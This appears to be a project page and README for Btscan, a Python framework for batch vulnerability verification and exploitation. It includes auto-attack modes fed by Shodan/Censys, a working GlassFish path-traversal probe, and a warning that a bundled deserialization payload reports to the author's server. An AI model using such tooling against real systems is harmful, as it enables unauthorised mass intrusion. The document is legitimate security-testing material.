he1m4n6a / Btscan
Batch vulnerability scanning framework
Stars: ✭ 108
Programming Languages
python
139335 projects - #7 most used programming language
Labels
Projects that are alternatives of or similar to Btscan
Kube Score
Kubernetes object analysis with recommendations for improved reliability and security
Stars: ✭ 1,128 (+944.44%)
Mutual labels: security-scanner
Keynuker
🔐💥 KeyNuker - nuke AWS keys accidentally leaked to Github
Stars: ✭ 82 (-24.07%)
Mutual labels: security-scanner
Doublepulsar Detection Script
A python2 script for sweeping a network to find windows systems compromised with the DOUBLEPULSAR implant.
Stars: ✭ 977 (+804.63%)
Mutual labels: security-scanner
Censys Ruby
Ruby API client for the Censys internet-wide network-scan search engine
Stars: ✭ 8 (-92.59%)
Mutual labels: security-scanner
Patrowldocs
PatrOwl - Open Source, Free and Scalable Security Operations Orchestration Platform
Stars: ✭ 105 (-2.78%)
Mutual labels: security-scanner
Hoper
Security tool to trace URL's jumps across the rel links to obtain the last URL
Stars: ✭ 50 (-53.7%)
Mutual labels: security-scanner
Machine Learning Approach For Malware Detection
A Machine Learning approach for classifying a file as Malicious or Legitimate
Stars: ✭ 35 (-67.59%)
Mutual labels: security-scanner
Slowhttptest
Application Layer DoS attack simulator
Stars: ✭ 1,003 (+828.7%)
Mutual labels: security-scanner
Vuls
Agent-less vulnerability scanner for Linux, FreeBSD, Container, WordPress, Programming language libraries, Network devices
Stars: ✭ 8,844 (+8088.89%)
Mutual labels: security-scanner
Gitgot
Semi-automated, feedback-driven tool to rapidly search through troves of public data on GitHub for sensitive secrets.
Stars: ✭ 964 (+792.59%)
Mutual labels: security-scanner
Btle Sniffer
Passively scan for Bluetooth Low Energy devices and attempt to fingerprint them
Stars: ✭ 87 (-19.44%)
Mutual labels: security-scanner
Lynis
Lynis - Security auditing tool for Linux, macOS, and UNIX-based systems. Assists with compliance testing (HIPAA/ISO27001/PCI DSS) and system hardening. Agentless, and installation optional.
Stars: ✭ 9,137 (+8360.19%)
Mutual labels: security-scanner
Vscan Go
golang version for nmap service and application version detection (without nmap installation)
Stars: ✭ 107 (-0.93%)
Mutual labels: security-scanner
Pakala
Offensive vulnerability scanner for ethereum, and symbolic execution tool for the Ethereum Virtual Machine
Stars: ✭ 97 (-10.19%)
Mutual labels: security-scanner
Intrigue Ident
Application and Service Fingerprinting
Stars: ✭ 70 (-35.19%)
Mutual labels: security-scanner
Directory structure
--lib core library files
--report folder where generated reports are written
--node each .py file in here is one attack vector; adding a scan node means adding a file here
--crawl scripts that collect URLs or IPs from cyberspace search engines
Usage
python btScan.py
usage: btScan.py [options]
* batch vulnerability verification and exploition framework. *
By he1m4n6a
optional arguments:
-h, --help show this help message and exit
-t THREADS Num of scan threads for each scan process, 20 by default
-m MODE select mode [config|script]
e.g. -m script
-n NAME from node floder choose a script
-c COMMAND give an instruction when use script mode [verify|exploit]
e.g. -c verify
-u URL_FILE input url file
-i IP_FILE input ip file
-autoIP get ip from space search engine and auto attack
-autoURL get url from space search engine and auto attack
-v show program's version number and exit
The script has two verification modes: one loads a module, the other reads a configuration file. Complex checks can be written as a loaded script; simple ones only need a configuration file. Attacks likewise have two modes: verify mode and exploit mode. You can supply IPs or URLs as the input format, or have them fetched automatically, which uses the cyberspace search crawler modules under the crawl folder.
Examples
python btscan.py -n joomla -m script -c verify -u url.txt
-n selects joomla.py under the node folder; -m sets script mode, i.e. the mode that loads a module; -c sets the mode to verify, which only checks for the vulnerability; -u sets the input to URL mode.
python btscan.py -n joomla -m script -c exploit -u url.txt
Same as above, but in exploit mode.
python btscan.py -m config -c verify -i ip.txt
-m sets config mode, -c sets verify mode, -i sets the input to IP mode; only the configuration in scan_rule.ini under the conf directory is needed.
Plugin writing rules
Just add a new .py file under the node folder.
The two important functions in that .py file are verify and exploit. If the node has no exploit attack mode, only the verify function is needed. The return value has three parts: the first is whether the vulnerability exists (True or False), the second is the URL, and the third is the message to print.
Example (glassfish.py)
#!/usr/bin/env python
#coding=utf8
import requests

def verify(ip):
    # Probe the GlassFish admin listener (port 4848) with the traversal path this node checks for
    url = 'https://' + str(ip) + ':4848//theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/'
    try:
        r = requests.get(url, verify=False, timeout=5)
        if 'ejb-timer-service-app' in r.text:
            msg = 'vul'
            return True, ip, msg    # (vulnerable?, target, message to print)
        else:
            msg = 'safe'
            return False, ip, msg
    except Exception as e:
        # timeouts and connection errors are reported as safe; uncomment to show the error instead
        #msg = str(e)
        msg = 'safe'
        return False, ip, msg

def exploit(ip):
    # this node has no separate exploit step, so exploit just runs verify
    return verify(ip)
All of the functions above can be defined as you like; the important ones are verify and exploit. If exploit is the same as verify, exploit only needs to call verify(url).
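As an added example (not part of Btscan and not its btScan.py), the following Python 3 dispatcher shows how a framework consumes the node contract described above: it loads a node by name, maps the -c verify/exploit command to the node's function (falling back to verify when a node defines no exploit), runs the targets through a thread pool, and enforces the (found, target, msg) three-tuple so that one badly written node or one unreachable target cannot break the whole batch. The names load_node, get_handler, normalize, run_batch and summarize, the demo node, and the assumption that nodes are importable as node.<name> are all my own.

```python
import importlib
import types
from concurrent.futures import ThreadPoolExecutor

COMMANDS = ("verify", "exploit")  # the -c values listed in the help text


def load_node(name, module=None):
    """Return the node module selected with -n NAME.

    Assumption (not from the page): nodes are importable as node.<name>,
    i.e. the node folder is on sys.path.  A ready module object can be passed
    instead, which is how the demo below avoids any file or network I/O.
    """
    mod = module if module is not None else importlib.import_module("node." + name)
    if not callable(getattr(mod, "verify", None)):
        raise ValueError("node %s does not define verify()" % name)
    return mod


def get_handler(mod, command):
    """Map -c COMMAND to the node function.  A node without exploit() only
    has a verify mode, so exploit falls back to verify."""
    if command not in COMMANDS:
        raise ValueError("unknown command %r, expected one of %s" % (command, COMMANDS))
    if command == "exploit" and not callable(getattr(mod, "exploit", None)):
        return mod.verify
    return getattr(mod, command)


def normalize(target, result):
    """Enforce the (found, target, msg) contract: a node that returns the
    wrong shape becomes an error row instead of corrupting the report."""
    if (isinstance(result, tuple) and len(result) == 3
            and isinstance(result[0], bool) and isinstance(result[2], str)):
        return result
    return (False, target, "error: node returned %r instead of (bool, target, msg)" % (result,))


def run_batch(mod, command, targets, threads=20):
    """Run the node over every target in a thread pool (-t THREADS, 20 by
    default as in the help text); exceptions are captured per target."""
    handler = get_handler(mod, command)

    def one(target):
        try:
            return normalize(target, handler(target))
        except Exception as exc:  # timeouts, refused connections, node bugs
            return (False, target, "error: %s" % exc)

    with ThreadPoolExecutor(max_workers=threads) as pool:
        return list(pool.map(one, targets))  # map() preserves input order


def summarize(results):
    """Group report rows: which targets were flagged and which errored."""
    return {
        "total": len(results),
        "vulnerable": [t for found, t, _ in results if found],
        "errors": [t for _, t, msg in results if msg.startswith("error")],
    }


def make_demo_node():
    """Constructed stand-in for a node/<name>.py with no network access:
    the 'vulnerability' is just a substring of the target string."""
    mod = types.ModuleType("node.demo")

    def verify(target):
        if "timeout" in target:
            raise RuntimeError("connection timed out")  # exercises the except path
        if "bad" in target:
            return "oops"                               # violates the contract
        found = "vuln" in target
        return found, target, ("vul" if found else "safe")

    mod.verify = verify  # no exploit(): run_batch must fall back to verify
    return mod


if __name__ == "__main__":
    demo = load_node("demo", module=make_demo_node())
    rows = run_batch(demo, "exploit", ["http://vuln.example", "http://ok.example",
                                       "http://timeout.example", "http://bad.example"], threads=4)
    for row in rows:
        print(row)
    print(summarize(rows))
```

Because map() keeps the input order, the rows line up with the URL or IP file, which is what a report generator under the report folder needs; the error rows make it visible when a node silently returned "safe" only because the target never answered.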
Other
The Shodan and Censys module keys in NetSearch.py under the crawl folder must be filled in yourself. The Java deserialization payload must be changed yourself, otherwise the results are sent to my VPS.
For any discussion or questions, contact me at [email protected]